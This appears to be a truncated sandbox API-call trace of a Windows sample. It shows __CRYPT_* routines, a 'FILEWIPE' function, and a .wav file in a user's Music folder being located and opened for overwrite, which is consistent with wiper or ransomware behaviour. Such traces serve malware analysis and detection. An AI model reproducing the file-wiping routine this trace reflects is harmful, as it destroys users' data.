0 [0182.372] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.372] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.372] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.372] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.372] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.372] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.372] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0182.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.373] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0182.373] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.373] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0182.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.373] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0182.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.373] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0182.373] FreeLibrary (hLibModule=0x74f20000) returned 1 [0182.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.373] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.373] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.378] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.378] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0182.378] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0xbaaf0410, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 0x90af58 [0182.379] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0182.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.380] CharLowerBuffW (in: lpsz="byte[98786]", cchLength=0xb | out: lpsz="byte[98786]") returned 0xb [0182.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.381] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0182.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.381] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0182.382] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27f8 [0182.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.382] FreeLibrary (hLibModule=0x75c90000) returned 1 [0182.383] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.383] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0182.383] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0182.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.386] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.386] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.386] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0182.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0182.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0182.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\ftar8k3covo_ce7d.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0182.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8fff00 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbe21f8 | out: hHeap=0x8a0000) returned 1 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, 